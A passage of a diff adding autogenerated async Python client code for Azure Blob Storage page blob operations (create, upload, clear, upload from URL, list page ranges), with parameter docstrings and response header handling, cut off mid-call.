blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param tier: Optional. Indicates the tier to be set on the page blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.PremiumPageBlobAccessTier + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. 
+ If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "PageBlob". Note that overriding this default value may result in + unsupported behavior. 
+ :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + blob_content_length=blob_content_length, + timeout=timeout, + tier=tier, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + 
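+        # Illustrative sketch (not generated code): page-blob creation is
+        # normally driven through the public BlobClient, which calls this
+        # operation. `conn_str` is an assumed connection string, and the size
+        # must be 512-byte aligned:
+        #
+        #     from azure.storage.blob.aio import BlobClient
+        #
+        #     blob = BlobClient.from_connection_string(
+        #         conn_str, container_name="data", blob_name="disk.vhd")
+        #     await blob.create_page_blob(size=1024)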
+ if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def upload_pages( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Pages operation writes a range of pages to a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. 
+ :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = 
modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.upload_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def clear_pages( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: 
Optional["_models.CpkScopeInfo"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Clear Pages operation clears a set of pages from a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "clear". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_clear_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_length=content_length, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.clear_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + 
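+        # Illustrative sketch (not generated code): writing and then clearing
+        # a 512-byte page through the public BlobClient; `blob` is assumed to
+        # be an azure.storage.blob.aio.BlobClient for an existing page blob:
+        #
+        #     data = b"\xff" * 512
+        #     await blob.upload_page(data, offset=0, length=512)
+        #     await blob.clear_page(offset=0, length=512)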
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + clear_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def upload_pages_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url: str, + source_range: str, + content_length: int, + range: str, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Pages operation writes a range of pages to a page blob where the contents are read + from a URL. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. The length of this range + should match the ContentLength header and x-ms-range/Range destination range header. + :type source_range: str + :param content_length: The length of the request. + :type content_length: long + :param range: The range of bytes to which the source range would be written. The range should + be 512 aligned and range-end is required. + :type range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. 
+ :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not 
None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_upload_pages_from_url_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + source_url=source_url, + source_range=source_range, + content_length=content_length, + range=range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.upload_pages_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', 
response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_page_ranges( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.PageList": + """The Get Page Ranges operation returns the list of valid page ranges for a page blob or snapshot + of a page blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + 